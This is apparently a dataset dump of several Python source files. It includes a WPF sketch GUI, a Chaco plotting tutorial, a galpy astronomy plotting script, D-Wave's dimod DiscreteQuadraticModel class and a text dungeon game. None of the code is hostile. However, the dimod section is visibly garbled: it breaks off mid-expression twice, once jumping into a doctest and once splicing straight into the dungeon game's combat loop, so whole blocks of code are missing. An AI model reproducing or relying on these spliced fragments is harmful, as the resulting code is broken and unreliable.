\r\n ms_stroke.DrawingAttributes.Color = color_from_hex(color)\r\n ms_stroke.DrawingAttributes.Width = width\r\n ms_stroke.DrawingAttributes.StylusTip = StylusTip.Ellipse\r\n ms_stroke.DrawingAttributes.IgnorePressure = True\r\n\r\n self.Canvas.Strokes.Add(ms_stroke)\r\n else:\r\n _SketchGUI.drawStroke(self, stroke, width = width, color = color, erasable = erasable)\r\n \r\n def drawBox(self, topleft, bottomright, topright = None, bottomleft = None, color=\"#000000\", width=2):\r\n os = width / 2# Offset to connect the point tips\r\n if topright is None:\r\n topright = Point(bottomright.X, topleft.Y)\r\n if bottomleft is None:\r\n bottomleft = Point(topleft.X, bottomright.Y)\r\n self.drawLine(topleft.X + os, topleft.Y - os, topright.X - os, topright.Y - os, color=color, width=width)\r\n self.drawLine(topright.X - os, topright.Y, bottomright.X - os, bottomright.Y, color=color, width=width)\r\n self.drawLine(bottomright.X - os, bottomright.Y + os, bottomleft.X + os, bottomleft.Y + os, color=color, width=width)\r\n self.drawLine(bottomleft.X + os, bottomleft.Y, topleft.X + os, topleft.Y, color=color, width=width)\r\n \r\n \"\"\"\r\n self.drawLine(topleft.X + 0, topleft.Y - 0, topright.X - 0, topright.Y - 0, color=\"#000000\", width=1)\r\n self.drawLine(topright.X - 0, topright.Y - 0, bottomright.X - 0, bottomright.Y + 0, color=\"#000000\", width=1)\r\n self.drawLine(bottomright.X - 0, bottomright.Y + 0, bottomleft.X + 0, bottomleft.Y + 0, color=\"#000000\", width=1)\r\n self.drawLine(bottomleft.X + 0, bottomleft.Y + 0, topleft.X + 0, topleft.Y - 0, color=\"#000000\", width=1)\r\n \"\"\"\r\n\r\n \r\ndef WpfSketchGUISingleton():\r\n if _WpfSketchGUI.Singleton == None:\r\n print (\"Creating new singleton\")\r\n LoadApp()\r\n \r\n print(\"Singleton value %s\" % (_WpfSketchGUI.Singleton))\r\n return _WpfSketchGUI.Singleton\r\n\r\n\r\n\r\n########################################\r\n\r\ndef color_from_hex(color_string):\r\n \"Convert a color string to a triple of bytes, (r,g,b)\"\r\n if type(color_string) is str:\r\n clist = []\r\n color_string = color_string[1:]\r\n \r\n for i in range(3):\r\n hexstr = color_string[2*i: 2*i + 2]\r\n clist.append(int('0x'+hexstr, 16))\r\n return Color.FromArgb(0xFF, clist[0], clist[1], clist[2])\r\n else:\r\n return None\r\n\r\ndef transformBoard_Wpf(x, y, height = None):\r\n return x, height - y\r\n\r\ndef loadStrokes(filename = \"saved_strokes.txt\"):\r\n \"Returns a list of strokes saved to filename\"\r\n strokelist = []\r\n current_stroke = None\r\n try:\r\n fp = open(filename, \"r\")\r\n for line in fp.readlines():\r\n if line.startswith(\"#Stroke\"):\r\n current_stroke = Stroke()\r\n elif line.startswith(\"#ENDStroke\"):\r\n if type(current_stroke) is Stroke:\r\n strokelist.append(current_stroke)\r\n current_stroke = None\r\n else:\r\n fields = line.split()\r\n if len(fields) == 3 and type(current_stroke) is Stroke:\r\n x = float(fields[0])\r\n y = float(fields[1])\r\n t = float(fields[2])\r\n current_stroke.addPoint(Point(x,y,t))\r\n fp.close()\r\n except:\r\n pass\r\n logger.debug(\"Loaded %s strokes\" % (len(strokelist) ) )\r\n return strokelist\r\n \r\n \r\ndef saveStrokes(strokes, filename = \"saved_strokes.txt\", overwrite = True, id = \"\"):\r\n \"Saves a single stroke to filename\"\r\n if overwrite:\r\n mode = \"w\"\r\n else:\r\n mode = \"a\"\r\n fp = open(filename, mode)\r\n for stk in strokes:\r\n print >> fp, \"#Stroke %s\" % (id)\r\n for point in stk.Points:\r\n print >> fp, point.X, point.Y, point.T\r\n print >> fp, \"#ENDStroke\"\r\n fp.close()\r\n\r\n\r\n\r\ndef LoadApp():\r\n global HEIGHT, WIDTH\r\n app = Application()\r\n\r\n #Load the XAML.\r\n xamlWindow = XamlReader.Load(FileStream('SketchFramework\\SketchCade.xaml', FileMode.Open))\t#Window object as the root.\r\n\r\n #wsg = _WpfSketchGUI( xamlWindow.InkCanvas )\r\n #_WpfSketchGUI.Singleton = wsg\r\n \r\n _WpfSketchGUI.Singleton = _WpfSketchGUI( xamlWindow.InkCanvas, xamlWindow.BackCanvas )\r\n \r\n\r\n #Bind the Event Handler\r\n xamlWindow.InkCanvas.StrokeCollected += _WpfSketchGUI.Singleton.InkCanvas_StrokeCollected\r\n xamlWindow.InkCanvas.StrokeErasing += _WpfSketchGUI.Singleton.InkCanvas_StrokeErasing\r\n xamlWindow.InkCanvas.MouseLeftButtonUp += _WpfSketchGUI.Singleton.InkCanvas_MouseLeftButtonUp\r\n #xamlWindow.InkCanvas.MouseUp += _WpfSketchGUI.Singleton.Canvas_MouseUp\r\n #xamlWindow.InkCanvas.MouseDown += _WpfSketchGUI.Singleton.Canvas_MouseDown\r\n xamlWindow.ClearButton.Click += _WpfSketchGUI.Singleton.ResetBoard\r\n xamlWindow.EraserButton.Click += _WpfSketchGUI.Singleton.ToggleCursorEraser\r\n xamlWindow.SaveButton.Click += _WpfSketchGUI.Singleton.SaveStrokesClicked\r\n xamlWindow.LoadButton.Click += _WpfSketchGUI.Singleton.LoadStrokesClicked\r\n xamlWindow.RestoreButton.Click += _WpfSketchGUI.Singleton.RestoreClicked\r\n xamlWindow.ChooseFileButton.Click += _WpfSketchGUI.Singleton.ChooseFileClicked\r\n xamlWindow.InkCanvas.MouseRightButtonUp += _WpfSketchGUI.Singleton.ToggleCursorEraser\r\n app.Run(xamlWindow)\r\n\r\n########################################\r\n\r\nif __name__ == \"__main__\":\r\n\r\n \r\n LoadApp()\r\n ","sub_path":"windows/SketchCade/SketchFramework/WpfSketchGUI.py","file_name":"WpfSketchGUI.py","file_ext":"py","file_size_in_byte":16330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522946371","text":"#!/usr/bin/env python\n#\n#\n# Tutorial 9b. Synchronize the Y data space as well,and add some tools.\n\n\nfrom tutorial8 import PlotFrame\nfrom enthought.chaco.tools.api import ZoomTool\n\nclass PlotFrame2(PlotFrame):\n def _create_plot(self):\n container = super(PlotFrame2, self)._create_plot()\n\n self.right_plot.index_mapper.range = self.left_plot.index_mapper.range\n self.right_plot.value_mapper.range = self.left_plot.value_mapper.range\n\n self.left_plot.overlays.append(ZoomTool(self.left_plot,\n tool_mode=\"box\", always_on=False))\n self.right_plot.overlays.append(ZoomTool(self.right_plot,\n tool_mode=\"box\", always_on=False))\n\n return container\n\nif __name__ == \"__main__\":\n import wx\n app = wx.PySimpleApp()\n frame = PlotFrame2(None)\n app.MainLoop()\n","sub_path":"examples/tutorials/tutorial9b.py","file_name":"tutorial9b.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"428029023","text":"###############################################################################\n# plot_maphz.py: plot h_Z in the feh,afe plane for MAPs\n###############################################################################\nimport sys\nimport pickle\nimport numpy\nimport matplotlib\nmatplotlib.use('Agg')\nfrom galpy.util import bovy_plot\nfrom matplotlib import pyplot, cm\nimport define_rcsample\ndef plot_maphz(plotname):\n # Load the three fits\n with open('../mapfits/tribrokenexpflare.sav','rb') as savefile:\n bf= numpy.array(pickle.load(savefile))\n samples= numpy.array(pickle.load(savefile))\n with open('../mapfits/tribrokenexp.sav','rb') as savefile:\n bfnf= numpy.array(pickle.load(savefile))\n samplesnf= numpy.array(pickle.load(savefile))\n with open('../mapfits/tribrokenexpfixedflare.sav','rb') as savefile:\n bfff= numpy.array(pickle.load(savefile))\n samplesff= numpy.array(pickle.load(savefile))\n maps= define_rcsample.MAPs()\n plotthisz= numpy.zeros(len(bf))+numpy.nan\n plotthisze= numpy.zeros(len(bf))+numpy.nan\n for ii, map in enumerate(maps.map()):\n if numpy.median(numpy.exp(samples[ii,3])[True-numpy.isnan(numpy.exp(samples[ii,3]))]) < 5.:\n tmed= numpy.median((1./samplesnf[ii,1])[True-numpy.isnan(1./samplesnf[ii,1])])\n terr= numpy.std((1./samplesnf[ii,1])[True-numpy.isnan(1./samplesnf[ii,1])])\n else:\n tmed= numpy.median((1./samplesff[ii,1])[True-numpy.isnan(1./samplesff[ii,1])])\n terr= numpy.std((1./samplesff[ii,1])[True-numpy.isnan(1./samplesff[ii,1])])\n plotthisz[ii]= tmed\n plotthisze[ii]= terr\n plotthisz[plotthisze/plotthisz > 0.2]= numpy.nan\n bovy_plot.bovy_print()\n maps.plot(plotthisz*1000.,\n vmin=200.,vmax=1000.,\n minnstar=15,\n zlabel=r'$h_Z\\,(\\mathrm{pc})$',\n shrink=0.655)\n # Sequences\n haloc= define_rcsample.highalphalocus()\n bovy_plot.bovy_plot(haloc[:,0],haloc[:,1],'-',color='0.75',\n lw=2.5,overplot=True)\n haloc= define_rcsample.lowalphalocus()\n haloc= haloc[(haloc[:,0] > -0.55)*(haloc[:,0] < 0.225)]\n bovy_plot.bovy_plot(haloc[:,0],haloc[:,1],'-',color='0.75',\n lw=2.5,overplot=True)\n # Label\n #t= pyplot.text(-0.51,0.235,r'$\\mathrm{single}$',\n # size=16.,color='w')\n #t.set_bbox(dict(alpha=0.5,color=cm.coolwarm(0.),\n # edgecolor='none'))\n #t= pyplot.text(-0.475,0.195,r'$\\mathrm{exponential}$',\n # size=16.,color='w')\n #t.set_bbox(dict(alpha=0.5,color=cm.coolwarm(0.),\n # edgecolor='none'))\n pyplot.tight_layout()\n bovy_plot.bovy_end_print(plotname,dpi=300)\n return None\n\nif __name__ == '__main__':\n plot_maphz(sys.argv[1])\n","sub_path":"py/plot_maphz.py","file_name":"plot_maphz.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454167727","text":"# Copyright 2020 D-Wave Systems Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport collections.abc as abc\nimport io\nimport json\nimport tempfile\nimport warnings\n\nfrom collections import namedtuple\nfrom operator import eq\n\nimport numpy as np\n\nfrom dimod.discrete.cydiscrete_quadratic_model import cyDiscreteQuadraticModel\nfrom dimod.sampleset import as_samples\nfrom dimod.serialization.fileview import VariablesSection, _BytesIO\nfrom dimod.utilities import iter_safe_relabels\n\n\n__all__ = ['DiscreteQuadraticModel', 'DQM']\n\n\n# constants for serialization\nDQM_MAGIC_PREFIX = b'DIMODDQM'\nDATA_MAGIC_PREFIX = b'BIAS'\nVERSION = bytes([1, 0]) # version 1.0\n\n\n# todo: update BinaryQuadraticModel.to_numpy_vectors to also use namedtuple\nDQMVectors = namedtuple(\n 'DQMVectors', ['case_starts', 'linear_biases', 'quadratic', 'labels'])\nQuadraticVectors = namedtuple(\n 'QuadraticVectors', ['row_indices', 'col_indices', 'biases'])\n\n\n# we want to use SpooledTemporaryFile but have it also include the methods\n# from io.IOBase. This is (probably) forthcoming in future python, see\n# https://bugs.python.org/issue35112\nif issubclass(tempfile.SpooledTemporaryFile, io.IOBase):\n warnings.warn(\"Using deprecated SpooledTemporaryFile wrapper, \"\n \"functionality is now included in SpooledTemporaryFile\",\n DeprecationWarning)\n\n\nclass _SpooledTemporaryFile(tempfile.SpooledTemporaryFile):\n\n # This is not part of io.IOBase, but it is implemented in io.BytesIO\n # and io.TextIOWrapper\n def readinto(self, *args, **kwargs):\n return self._file.readinto(*args, **kwargs)\n\n def readable(self):\n return self._file.readable()\n\n def seekable(self):\n return self._file.seekable()\n\n def writable(self):\n return self._file.writable()\n\n\n# this is the third(!) variables implementation in dimod. It differs from\n# dimod.variables in that it stores its labels sparsely. It has the same\n# behaviour as the cyBQM ones, except that it rolls the logic up into a\n# object. These need to be unified.\nclass _Variables(abc.Sequence, abc.Set):\n def __init__(self):\n self._label_to_idx = dict()\n self._idx_to_label = dict()\n self.stop = 0\n\n def __contains__(self, v):\n return v in self._label_to_idx or (isinstance(v, int)\n and 0 <= v < self.stop\n and v not in self._idx_to_label)\n\n def __eq__(self, other):\n if isinstance(other, abc.Sequence):\n return len(self) == len(other) and all(map(eq, self, other))\n elif isinstance(other, abc.Set):\n return not (self ^ other)\n else:\n return False\n\n def __getitem__(self, idx):\n\n if not isinstance(idx, int):\n raise TypeError(\"index must be an integer.\")\n\n given = idx # for error message\n\n # handle negative indexing\n if idx < 0:\n idx = self.stop + idx\n\n if idx >= self.stop:\n raise IndexError('index {} out of range'.format(given))\n\n return self._idx_to_label.get(idx, idx)\n\n def __len__(self):\n return self.stop\n\n def __ne__(self, other):\n return not (self == other)\n\n @property\n def is_range(self):\n return not self._label_to_idx\n\n def _append(self, v=None):\n \"\"\"Append a new variable.\"\"\"\n\n if v is None:\n # handle the easy case\n if self.is_range:\n self.stop += 1\n return\n\n # we need to pick a new label\n v = self.stop\n\n if v not in self:\n # it's free, so we can stop\n self.stop += 1\n return\n\n # there must be a free integer available\n v = 0\n while v in self:\n v += 1\n\n elif v in self:\n raise ValueError('{!r} is already a variable'.format(v))\n\n idx = self.stop\n\n if idx != v:\n self._label_to_idx[v] = idx\n self._idx_to_label[idx] = v\n\n self.stop += 1\n\n return\n\n def index(self, v):\n # todo: support start and end like list.index\n if v not in self:\n raise ValueError('unknown variable {!r}'.format(v))\n return self._label_to_idx.get(v, v)\n\n def _relabel(self, mapping):\n for submap in iter_safe_relabels(mapping, self):\n for old, new in submap.items():\n if old == new:\n continue\n\n idx = self._label_to_idx.pop(old, old)\n\n if new != idx:\n self._label_to_idx[new] = idx\n self._idx_to_label[idx] = new # overwrites old idx\n else:\n self._idx_to_label.pop(idx, None)\n\n def _relabel_as_integers(self):\n mapping = self._idx_to_label.copy()\n self._idx_to_label.clear()\n self._label_to_idx.clear()\n return mapping\n\n\nclass DiscreteQuadraticModel:\n \"\"\"Encodes a discrete quadratic model.\n\n A discrete quadratic model is a polynomial over discrete variables with\n terms all of degree two or less.\n\n Examples:\n\n This example constructs a map coloring with Canadian provinces. To\n solve the problem we penalize adjacent provinces having the same color.\n\n >>> provinces = [\"AB\", \"BC\", \"ON\", \"MB\", \"NB\", \"NL\", \"NS\", \"NT\", \"NU\",\n ... \"PE\", \"QC\", \"SK\", \"YT\"]\n >>> borders = [(\"BC\", \"AB\"), (\"BC\", \"NT\"), (\"BC\", \"YT\"), (\"AB\", \"SK\"),\n ... (\"AB\", \"NT\"), (\"SK\", \"MB\"), (\"SK\", \"NT\"), (\"MB\", \"ON\"),\n ... (\"MB\", \"NU\"), (\"ON\", \"QC\"), (\"QC\", \"NB\"), (\"QC\", \"NL\"),\n ... (\"NB\", \"NS\"), (\"YT\", \"NT\"), (\"NT\", \"NU\")]\n >>> colors = [0, 1, 2, 3]\n ...\n >>> dqm = dimod.DiscreteQuadraticModel()\n >>> for p in provinces:\n ... _ = dqm.add_variable(4, label=p)\n >>> for p0, p1 in borders:\n ... dqm.set_quadratic(p0, p1, {(c, c): 1 for c in colors})\n\n The next examples show how to view and manipulate the model biases.\n\n >>> dqm = dimod.DiscreteQuadraticModel()\n\n Add the variables to the model\n\n >>> u = dqm.add_variable(5) # unlabeled variable with 5 cases\n >>> v = dqm.add_variable(3, label='v') # labeled variable with 3 cases\n\n The linear biases default to 0. They can be read by case or by batch.\n\n >>> dqm.get_linear_case(u, 1)\n 0.0\n >>> dqm.get_linear(u)\n array([0., 0., 0., 0., 0.])\n >>> dqm.get_linear(v)\n array([0., 0., 0.])\n\n The linear biases can be overwritten either by case or in a batch.\n\n >>> dqm.set_linear_case(u, 3, 17)\n >>> dqm.get_linear(u)\n array([ 0., 0., 0., 17., 0.])\n >>> dqm.set_linear(v, [0, -1, 3])\n >>> dqm.get_linear(v)\n array([ 0., -1., 3.])\n\n The quadratic biases can also be manipulated sparsely or densely.\n\n >>> dqm.set_quadratic(u, v, {(0, 2): 1.5})\n >>> dqm.get_quadratic(u, v)\n {(0, 2): 1.5}\n >>> dqm.get_quadratic(u, v, array=True) # as a NumPy array\n array([[0. , 0. , 1.5],\n [0. , 0. , 0. ],\n [0. , 0. , 0. ],\n [0. , 0. , 0. ],\n [0. , 0. , 0. ]])\n >>> dqm.set_quadratic_case(u, 2, v, 1, -3)\n >>> dqm.get_quadratic(u, v, array=True)\n array([[ 0. , 0. , 1.5],\n [ 0. , 0. , 0. ],\n [ 0. , -3. , 0. ],\n [ 0. , 0. , 0. ],\n [ 0. , 0. , 0. ]])\n >>> dqm.get_quadratic(u, v) # doctest:+SKIP\n {(0, 2): 1.5, (2, 1): -3.0}\n\n \"\"\"\n\n def __init__(self):\n self.variables = _Variables()\n self._cydqm = cyDiscreteQuadraticModel()\n\n @property\n def adj(self):\n \"\"\"dict[hashable, set]: The adjacency structure of the variables.\"\"\"\n return dict((self.variables[ui],\n set(self.variables[vi] for vi in neighborhood))\n for ui, neighborhood in enumerate(self._cydqm.adj))\n\n def add_variable(self, num_cases, label=None):\n \"\"\"Add a discrete variable.\n\n Args:\n num_cases (int):\n The number of cases in the variable. Must be a positive\n integer.\n\n label (hashable, optional):\n A label for the variable. Can be any hashable except `None`.\n Defaults to the length of the discrete quadratic model, if that\n label is available. Otherwise defaults to the lowest available\n positive integer label.\n\n Returns:\n The label of the new variable.\n\n Raises:\n ValueError: If `label` already exists as a variable label.\n TypeError: If `label` is not hashable.\n\n \"\"\"\n self.variables._append(label)\n variable_index = self._cydqm.add_variable(num_cases)\n assert variable_index + 1 == len(self.variables)\n return self.variables[-1]\n\n # todo: support __copy__ and __deepcopy__\n def copy(self):\n \"\"\"Return a copy of the discrete quadratic model.\"\"\"\n new = type(self)()\n new._cydqm = self._cydqm.copy()\n for v in self.variables:\n new.variables._append(v)\n return new\n\n def energy(self, sample):\n energy, = self.energies(sample)\n return energy\n\n def energies(self, samples):\n samples, labels = as_samples(samples, dtype=self._cydqm.case_dtype)\n\n # reorder as needed\n if len(labels) != self.num_variables():\n raise ValueError(\n \"Given sample(s) have incorrect number of variables\")\n if self.variables != labels:\n # need to reorder the samples\n label_to_idx = dict((v, i) for i, v in enumerate(labels))\n\n try:\n order = [label_to_idx[v] for v in self.variables]\n except KeyError:\n raise ValueError(\"given samples-like does not match labels\")\n\n samples = samples[:, order]\n\n return np.asarray(self._cydqm.energies(samples))\n\n @classmethod\n def _from_file_numpy(cls, file_like):\n\n magic = file_like.read(len(DATA_MAGIC_PREFIX))\n if magic != DATA_MAGIC_PREFIX:\n raise ValueError(\"unknown file type, expected magic string {} but \"\n \"got {}\".format(DATA_MAGIC_PREFIX, magic))\n\n length = np.frombuffer(file_like.read(4), '>> dqm = dimod.DiscreteQuadraticModel()\n >>> u = dqm.add_variable(5)\n >>> v = dqm.add_variable(3, label='3var')\n >>> dqm.set_quadratic(u, v, {(0, 2): 1})\n >>> vectors = dqm.to_numpy_vectors()\n >>> new = dimod.DiscreteQuadraticModel.from_numpy_vectors(*vectors)\n\n See Also:\n :meth:`~DiscreteQuadraticModel.to_numpy_vectors`\n\n \"\"\"\n\n obj = cls()\n\n obj._cydqm = cyDiscreteQuadraticModel.from_numpy_vectors(\n case_starts, linear_biases, quadratic)\n\n if labels is not None:\n if len(labels) != obj._cydqm.num_variables():\n raise ValueError(\n \"labels does not match the length of the DQM\"\n )\n\n for v in labels:\n obj.variables._append(v)\n else:\n for v in range(obj._cydqm.num_variables()):\n obj.variables._append()\n\n return obj\n\n def get_linear(self, v):\n \"\"\"The linear biases associated with variable `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n Returns:\n :class:`~numpy.ndarray`: The linear biases in an array.\n\n \"\"\"\n return self._cydqm.get_linear(self.variables.index(v))\n\n def get_linear_case(self, v, case):\n \"\"\"The linear bias associated with case `case` of variable `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n case (int): The case of `v`.\n\n Returns:\n The linear bias.\n\n \"\"\"\n return self._cydqm.get_linear_case(self.variables.index(v), case)\n\n def get_quadratic(self, u, v, array=False):\n \"\"\"The biases associated with the interaction between `u` and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n v: A variable in the discrete quadratic model.\n\n array (bool, optional, default=False): If True, a dense array is\n returned rather than a dict.\n\n Returns:\n The quadratic biases. If `array=False`, returns a dictionary of the\n form `{case_u, case_v: bias, ...}`\n If `array=True`, returns a\n :meth:`~DiscreteQuadraticModel.num_cases(u)` by\n :meth:`~DiscreteQuadraticModel.num_cases(v)` numpy array.\n\n \"\"\"\n return self._cydqm.get_quadratic(\n self.variables.index(u),\n self.variables.index(v),\n array=array)\n\n def get_quadratic_case(self, u, u_case, v, v_case):\n \"\"\"The bias associated with the interaction between two cases of `u`\n and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n u_case (int): The case of `u`.\n\n v: A variable in the discrete quadratic model.\n\n v_case (int): The case of `v`.\n\n Returns:\n The quadratic bias.\n\n \"\"\"\n return self._cydqm.get_quadratic_case(\n self.variables.index(u), u_case, self.variables.index(v), v_case)\n\n def num_cases(self, v=None):\n \"\"\"If v is provided, the number of cases associated with v, otherwise\n the total number of cases in the DQM.\n \"\"\"\n if v is None:\n return self._cydqm.num_cases()\n return self._cydqm.num_cases(self.variables.index(v))\n\n def num_case_interactions(self):\n \"\"\"The total number of case interactions.\"\"\"\n return self._cydqm.num_case_interactions()\n\n def num_variable_interactions(self):\n \"\"\"The total number of variable interactions\"\"\"\n return self._cydqm.num_variable_interactions()\n\n def num_variables(self):\n \"\"\"The number of variables in the discrete quadratic model.\"\"\"\n return self._cydqm.num_variables()\n\n def relabel_variables(self, mapping, inplace=True):\n if not inplace:\n return self.copy().relabel_variables(mapping, inplace=True)\n self.variables._relabel(mapping)\n return self\n\n def relabel_variables_as_integers(self, inplace=True):\n \"\"\"Relabel the variables of the DQM to integers.\n\n Args:\n inplace (bool, optional, default=True):\n If True, the discrete quadratic model is updated in-place;\n otherwise, a new discrete quadratic model is returned.\n\n Returns:\n tuple: A 2-tuple containing:\n\n A discrete quadratic model with the variables relabeled. If\n `inplace` is set to True, returns itself.\n\n dict: The mapping that will restore the original labels.\n\n \"\"\"\n if not inplace:\n return self.copy().relabel_variables_as_integers(inplace=True)\n return self, self.variables._relabel_as_integers()\n\n def set_linear(self, v, biases):\n \"\"\"Set the linear biases associated with `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n biases (array-like): The linear biases in an array.\n\n \"\"\"\n self._cydqm.set_linear(self.variables.index(v), np.asarray(biases))\n\n def set_linear_case(self, v, case, bias):\n \"\"\"The linear bias associated with case `case` of variable `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n case (int): The case of `v`.\n\n bias (float): The linear bias.\n\n \"\"\"\n self._cydqm.set_linear_case(self.variables.index(v), case, bias)\n\n def set_quadratic(self, u, v, biases):\n \"\"\"Set biases associated with the interaction between `u` and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n v: A variable in the discrete quadratic model.\n\n biases (array-like/dict):\n The quadratic biases. If a dict, then a dictionary of the\n form `{case_u, case_v: bias, ...}`. Otherwise, then should be,\n a :meth:`~DiscreteQuadraticModel.num_cases(u)` by\n :meth:`~DiscreteQuadraticModel.num_cases(v)` array-like.\n\n \"\"\"\n self._cydqm.set_quadratic(\n self.variables.index(u),\n self.variables.index(v),\n biases)\n\n def set_quadratic_case(self, u, u_case, v, v_case, bias):\n \"\"\"Set the bias associated with the interaction between two cases of\n `u` and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n u_case (int): The case of `u`.\n\n v: A variable in the discrete quadratic model.\n\n v_case (int): The case of `v`.\n\n bias (float): The quadratic bias.\n\n \"\"\"\n self._cydqm.set_quadratic_case(\n self.variables.index(u), u_case,\n self.variables.index(v), v_case,\n bias)\n\n def _to_file_numpy(self, file, compress):\n # the biases etc, saved using numpy\n\n # we'd like to just let numpy handle the header etc, but it doesn't\n # do a good job of cleaning up after itself in np.load, so we record\n # the section length ourselves\n file.write(DATA_MAGIC_PREFIX)\n file.write(b' ') # will be replaced by the length\n start = file.tell()\n\n vectors = self.to_numpy_vectors()\n\n if compress:\n save = np.savez_compressed\n else:\n save = np.savez\n\n save(file,\n case_starts=vectors.case_starts,\n linear_biases=vectors.linear_biases,\n quadratic_row_indices=vectors.quadratic.row_indices,\n quadratic_col_indices=vectors.quadratic.col_indices,\n quadratic_biases=vectors.quadratic.biases,\n )\n\n # record the length\n end = file.tell()\n file.seek(start-4)\n file.write(np.dtype(' \")\n if choice == \"1\":\n if len(enemies) < 1:\n os.system(\"clear\")\n print(\"All enemies are dead, you are just swinging at the air\")\n return\n count = 1\n for enemy in enemies:\n print(enemy.name, count)\n count += 1\n choice = None\n while not choice:\n try:\n choice = int(input(\"Select target > \"))\n except:\n print(\"Please enter numeric value\")\n choice -=1\n os.system(\"clear\")\n if choice < len(enemies):\n attacked = 0\n for item in order:\n if combat_order[item] == player:\n rolls = player.attack(enemies[choice])\n print(\"player attacks {2}, {3} rolls {0}, {2} rolls {1}\".format(rolls[0], rolls[1], enemies[choice].name, player.name))\n if rolls[0][0] >= rolls[1][0]:\n print(player.name, \"strikes\", enemies[choice].name)\n if enemies[choice].life <= 0:\n print(enemies[choice].name, \" has been slain\")\n enemies.pop(choice)\n elif attacked == 0:\n if combat_order[item].life > 0:\n rolls = combat_order[item].attack(player)\n print(combat_order[item].name, \"attacks\", player.name + \",\", \"{2} rolls {0}, {3} rolls {1}\".format(rolls[0], rolls[1], combat_order[item].name, player.name))\n if rolls[0][0] >= rolls[1][0]:\n print(combat_order[item].name, \"strikes\", player.name)\n if player.life <= 0:\n print(player.name, \"has been slain\")\n return False\n attacked = 1\n elif choice == \"2\":\n os.system(\"clear\")\n print(\"current life is :\",player.life)\n elif choice == \"3\":\n count = 1\n os.system(\"clear\")\n for enemy in enemies:\n print(enemy.name, enemy.life)\n count += 1\n elif choice == \"4\":\n num = 1\n os.system(\"clear\")\n for item in player.inventory:\n print(str(num), \":\", item.name)\n num += 1\n elif choice == \"5\":\n num = 1\n for item in player.inventory:\n print(str(num), \":\", item.name)\n num += 1\n try:\n choice = int(input(\"select potion > \"))\n except:\n os.system(\"clear\")\n print(\"invalid input\")\n return\n for _id,victim in combat_order.items():\n print(_id, \":\", victim.name)\n try:\n target = int(input(\"select target > \"))\n except:\n os.system(\"clear\")\n print(\"invalid input\")\n return\n try:\n os.system(\"clear\")\n if isinstance(player.inventory[choice-1], items.Potion):\n player.inventory[choice-1].use_potion(combat_order[target])\n if player.inventory[choice-1].effect < 4:\n if combat_order[target] == player:\n print(\"You feel stronger\")\n else:\n print(combat_order[target].name, \"looks stronger\")\n elif player.inventory[choice-1].effect < 7:\n if combat_order[target] == player:\n print(\"You feel ill\")\n else:\n print(combat_order[target].name, \"looks ill\")\n elif player.inventory[choice-1].effect == 7:\n if combat_order[target] == player:\n print(\"You feel crazy\")\n else:\n print(combat_order[target].name, \"looks crazy\")\n player.inventory.pop(choice-1)\n else:\n print(player.inventory[choice-1].name, \"is not a potion\")\n except:\n \n print(\"invalid selection\")\n elif choice == \"6\":\n if len(enemies) < 1 or player.found == False:\n next_room(player.found, dungeon)\n else:\n os.system(\"clear\")\n print(\"You are in combat currently\")\n elif choice == \"q\":\n choice = input(\"1: save\\nanything else: quit\\n> \")\n if choice == \"1\":\n file = open(\"dungeon.dat\",\"wb\")\n pickle.dump(dungeon, file)\n file.close()\n file = open(\"player.dat\",\"wb\")\n pickle.dump(player, file)\n file.close()\n print(\"game saved in dungeon.dat and player.dat, please do not touch\")\n quit()\n else: \n quit()\n elif choice == \"~tgm\":\n print(\"The power of a thousand suns flows within you as you ascend to demigod status\")\n player.life = 100000000\n return\n\ndef next_room(found, dungeon):\n \"\"\"\n move the player into the next room\n \"\"\"\n if not found:\n print(\"You can attempt to avoid combat and move on to the next room, you however will not receive any loot\")\n choice = input(\"1: attempt to skip the room\\nelse: jump headlong into the room screaming bloody murder\\n\")\n if choice == \"1\":\n fail = False\n for monster in range(len(dungeon.rooms[dungeon.room].monsters)):\n if random.randint(0,12) < dungeon.rooms[dungeon.room].monsters[monster].inish:\n fail = True\n if fail == False:\n dungeon.skip = 1\n print(\"Choose your path, 1 - {0}: forward\".format(len(dungeon.rooms[dungeon.room].doors)-1))\n try:\n choice = int(input(\"> \"))\n if choice > 0:\n dungeon.room += 1\n dungeon.difficulty += random.randint(-3,3)+random.choice([choice, -choice])\n if dungeon.difficulty < 2:\n dungeon.difficulty = 2\n else:\n dungeon.room += 1\n dungeon.difficulty += 1\n except:\n print(\"You were spotted trying to escape\")\n else:\n print(\"You were spotted trying to escape\")\n else:\n print(\"With the monsters dead, you are free to move on to another room, there are {0} doors to choose from\".format(len(dungeon.rooms[dungeon.room].doors)-1))\n print(\"Choose your path, 1 - {0}: forward\".format(len(dungeon.rooms[dungeon.room].doors)-1))\n try:\n choice = int(input(\"> \"))\n dungeon.skip = 2\n if choice > 0:\n dungeon.room += 1\n if choice < len(dungeon.rooms[dungeon.room].doors):\n dungeon.difficulty += random.choice([choice, -choice])\n if dungeon.difficulty < 1:\n dungeon.difficulty = 1\n else:\n dungeon.difficulty += random.randint(1,20)\n else:\n dungeon.room += 1\n dungeon.difficulty += random.randint(1,10)\n except:\n dungeon.skip = 2\n dungeon.room += 1\n dungeon.difficulty += random.randint(1,10)\n\ndef populate_room(dungeon, room, monster_list, boss = 0):\n \"\"\"\n fills the room with monsters\n \"\"\"\n for monster in range(len(room.monsters)):\n spawn = monster_list[monster % len(monster_list)]\n if boss == 1:\n hits = 